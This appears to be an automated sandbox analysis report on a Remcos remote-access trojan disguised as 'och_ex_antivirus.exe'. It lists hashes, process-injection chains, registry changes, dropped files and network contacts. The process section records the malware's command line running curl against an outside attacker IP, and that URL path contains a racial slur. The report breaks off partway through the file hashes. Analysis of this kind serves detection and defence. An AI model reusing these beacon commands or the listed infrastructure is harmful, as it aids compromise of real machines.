Malware Analysis Report

2024-11-13 18:49

Sample ID 240422-n4l3tsah87
Target och_ex_antivirus.exe
SHA256 042767e0fa4fa7fe964a771a9d743ebb740d4f9a1e59609c704f51958310b1ff
Tags
remcos remotehost evasion rat trojan
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 042767e0fa4fa7fe964a771a9d743ebb740d4f9a1e59609c704f51958310b1ff

Threat Level: Known bad

The file och_ex_antivirus.exe was found to be: Known bad.

Malicious Activity Summary

remcos remotehost evasion rat trojan

Remcos

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Checks whether UAC is enabled

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-04-22 11:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-04-22 11:57

Reported 2024-04-22 11:59

Platform win7-20240221-en

Max time kernel 118s

Max time network 119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"

Signatures

Remcos

rat remcos

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2748 set thread context of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 2860 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 2860 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 2860 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 2596 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 2596 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 2596 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 2596 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 1644 wrote to memory of 2096 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 2096 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 2096 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 2096 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 2096 wrote to memory of 2316 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 2316 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 2316 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 2316 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 1644 wrote to memory of 1316 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 1316 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 1316 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 1316 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe

"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QGTQZTRE

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\chthemyndekf.vbs"

Network

Country Destination Domain Proto
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp

Files

memory/2860-0-0x0000000100000000-0x0000000101123000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a4d0d0ec

MD5 47842103e2e4b1f02de9a4dea3b65dcc
SHA1 11bb3c3c1ad4f6b4fc7769ecf14b4f9e5ede5dda
SHA256 0cb81803e081f6491491f74f857d6e738307ede06bd3e9e39f4b5f44c0bd2548
SHA512 18d986698df11ad9032fa0fc90417f0f6b411158c73d93824ec6030908b5d1f5ddbcd4628f7fcab5b8bf04e559ac39b6a85c24449cb126c0b26a9bb24d77b322

memory/2860-6-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

memory/2860-8-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

memory/2860-15-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

MD5 64179e64675e822559cac6652298bdfc
SHA1 cceed3b2441146762512918af7bf7f89fb055583
SHA256 c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9
SHA512 ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280

memory/2860-30-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolsync\MSVCP140.dll

MD5 71a0aa2d05e9174cefd568347bd9c70f
SHA1 cb9247a0fa59e47f72df7d1752424b33a903bbb2
SHA256 fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47
SHA512 6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a

C:\Users\Admin\AppData\Local\Temp\toolsync\VCRUNTIME140.dll

MD5 16b26bc43943531d7d7e379632ed4e63
SHA1 565287de39649e59e653a3612478c2186096d70a
SHA256 346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517
SHA512 b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc

C:\Users\Admin\AppData\Local\Temp\toolsync\wbxtrace.dll

MD5 c2b06a78b6c07a1371b6aed1dbf4fc37
SHA1 b8847693e7cd3637b1b400e71430cdf629de2e64
SHA256 9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04
SHA512 219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411

C:\Users\Admin\AppData\Local\Temp\toolsync\ptusredt.dll

MD5 3c3e960d59cb413791fee1e944b6df72
SHA1 4aa6c90d81692642ca8266bf0d8e249ff3e3ad54
SHA256 88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67
SHA512 85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac

C:\Users\Admin\AppData\Local\Temp\toolsync\ptMgr.dll

MD5 2087eb2d3fb639933ebe0a0614fd5218
SHA1 c1a1b75c8e76e000b7045092bd11100904a72840
SHA256 725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f
SHA512 3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e

memory/2596-41-0x00000000002F0000-0x00000000002F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolsync\WCLDll.dll

MD5 b3e030ab715a02f8864a79f552a247b7
SHA1 4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa
SHA256 2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955
SHA512 cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda

C:\Users\Admin\AppData\Local\Temp\toolsync\cyclopedia.html

MD5 db3f3969e8a2f913fe3643d8465171b1
SHA1 736095ea1e02547a6df2586fffdbf31bb7d23656
SHA256 c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043
SHA512 0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b

C:\Users\Admin\AppData\Local\Temp\toolsync\audiovisual.psd

MD5 a0a180d2677f494049d7a55c888fed93
SHA1 d09358fddc9a67ae55b5ba4a34fba04357b528db
SHA256 5e086150a36e2e98c91464a210499648832172f883c1bd515c4a0661a10866bd
SHA512 1f152fe593a25c05973b351206a40953bd801b8c77f04c2f20c966869fe72d2b6c71ed5bd77e64942153f0dca590e2655340a93d8b7eb29d558152f1a7b6fde1

memory/2596-45-0x00000000741E0000-0x0000000074354000-memory.dmp

memory/2596-46-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/2748-72-0x0000000000120000-0x0000000000121000-memory.dmp

memory/2748-76-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2748-77-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/2748-78-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2860-79-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

memory/2748-80-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2508-82-0x0000000074510000-0x0000000074684000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\afc00fbd

MD5 a44564c5624447597ad73d1a4ad63375
SHA1 229b2fa4ced130aa45395760b1b16b3bd0363ac7
SHA256 e398903e8fdce879747ec96c118306a0e9c1d5aaf41ac79e2c1142b961051bb8
SHA512 e0fd05cbc7a17f58358214950d05163b03008d147c68f31c1db9ff055527d82136e023dab745a7b41abe1ddcbb39ff7c66ed6fe4c4539e6a18d8c75de99f3c8a

memory/2508-84-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/2508-131-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2508-132-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2508-134-0x0000000074510000-0x0000000074684000-memory.dmp

memory/1644-135-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/1644-136-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-138-0x0000000000C50000-0x0000000000ED1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\check1.vbs

MD5 85a2ebad40c21ba1da77230265b5351f
SHA1 803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256 b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA512 77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

memory/1644-144-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-145-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-146-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-147-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-148-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-152-0x0000000000400000-0x0000000000483000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chthemyndekf.vbs

MD5 20194639a471c85332924601e071aec4
SHA1 6a69ca7f78b34ca6a3959236237ef62de1cf09a2
SHA256 43dddf81fa819e8499eb4a24211a2702ee8a3fc04048d4a8e3b3f4f9420c68e8
SHA512 5616837814bf251f1d007cbaf8002aa66b91b199833437ca236507adaa40ece785264da6857445ab8ae958803453af67f631a0ec0cd1c931c7f3e763c24bc079

Analysis: behavioral2

Detonation Overview

Submitted 2024-04-22 11:57

Reported 2024-04-22 11:59

Platform win10v2004-20240412-en

Max time kernel 141s

Max time network 139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"

Signatures

Remcos

rat remcos

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1856 set thread context of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings C:\Windows\SysWOW64\explorer.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3232 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 3232 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 3232 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 3948 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 3948 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 3948 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 1856 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 1856 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 1856 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 1856 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 1084 wrote to memory of 2472 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1084 wrote to memory of 2472 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1084 wrote to memory of 2472 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 2472 wrote to memory of 4980 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 4980 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 4980 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 1084 wrote to memory of 4660 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1084 wrote to memory of 4660 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1084 wrote to memory of 4660 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe

"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO

C:\Windows\SysWOW64\curl.exe

curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\upeegjbouopehpnbxkclalylbt.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 28.143.109.104.in-addr.arpa udp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
US 8.8.8.8:53 155.57.33.178.in-addr.arpa udp
NL 94.156.66.107:9000 tcp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
US 8.8.8.8:53 219.138.73.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3232-0-0x00007FF7915A0000-0x00007FF7926C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e53664e3

MD5 47842103e2e4b1f02de9a4dea3b65dcc
SHA1 11bb3c3c1ad4f6b4fc7769ecf14b4f9e5ede5dda
SHA256 0cb81803e081f6491491f74f857d6e738307ede06bd3e9e39f4b5f44c0bd2548
SHA512 18d986698df11ad9032fa0fc90417f0f6b411158c73d93824ec6030908b5d1f5ddbcd4628f7fcab5b8bf04e559ac39b6a85c24449cb126c0b26a9bb24d77b322

memory/3232-6-0x00007FF8CB900000-0x00007FF8CBA72000-memory.dmp

memory/3232-8-0x00007FF8CB900000-0x00007FF8CBA72000-memory.dmp

memory/3232-25-0x00007FF8CB900000-0x00007FF8CBA72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

MD5 64179e64675e822559cac6652298bdfc
SHA1 cceed3b2441146762512918af7bf7f89fb055583
SHA256 c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9
SHA512 ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280

C:\Users\Admin\AppData\Local\Temp\toolsync\VCRUNTIME140.dll

MD5 16b26bc43943531d7d7e379632ed4e63
SHA1 565287de39649e59e653a3612478c2186096d70a
SHA256 346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517
SHA512 b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc

C:\Users\Admin\AppData\Local\Temp\toolsync\MSVCP140.dll

MD5 71a0aa2d05e9174cefd568347bd9c70f
SHA1 cb9247a0fa59e47f72df7d1752424b33a903bbb2
SHA256 fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47
SHA512 6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a

C:\Users\Admin\AppData\Local\Temp\toolsync\wbxtrace.dll

MD5 c2b06a78b6c07a1371b6aed1dbf4fc37
SHA1 b8847693e7cd3637b1b400e71430cdf629de2e64
SHA256 9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04
SHA512 219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411

C:\Users\Admin\AppData\Local\Temp\toolsync\ptusredt.dll

MD5 3c3e960d59cb413791fee1e944b6df72
SHA1 4aa6c90d81692642ca8266bf0d8e249ff3e3ad54
